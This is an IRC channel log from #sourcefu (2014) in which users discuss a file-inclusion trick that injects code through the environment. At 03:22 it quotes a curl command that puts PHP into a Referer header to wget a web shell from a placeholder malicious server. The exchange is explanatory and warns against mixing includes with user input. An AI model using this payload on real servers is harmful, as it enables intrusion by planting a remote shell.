greptilian logo

IRC log for #sourcefu, 2014-03-05

http://sourcefu.com

| Channels | #sourcefu index | Today | | Search | Google Search | Plain-Text | plain, newest first | summary

All times shown according to UTC.

Time S Nick Message
03:19 codex yea
03:19 codex but the scary part is that it gets you write
03:19 codex because of the "loopback" trick -- getting the user suplied vars to spit back + execute
03:22 pdurbin this example: curl http://www.example.com/user1/x.cgi?file=/proc/self/environ --referer "echo \"<?php system('wget -O /home/user1/public_html/shell.cgi http://malicious-server.com/shell.cgi'); ?> | php\""
03:24 pdurbin codex: you emphasize the problem adequately: "You should never mix INCLUDES with dynamic code – specifically, anything that allows user input. This is just a terrible idea."
11:51 sivoais_ joined #sourcefu
12:20 onder`_ joined #sourcefu
16:47 sivoais joined #sourcefu
18:56 lorachka joined #sourcefu
21:16 hydrargium joined #sourcefu

| Channels | #sourcefu index | Today | | Search | Google Search | Plain-Text | plain, newest first | summary

http://sourcefu.com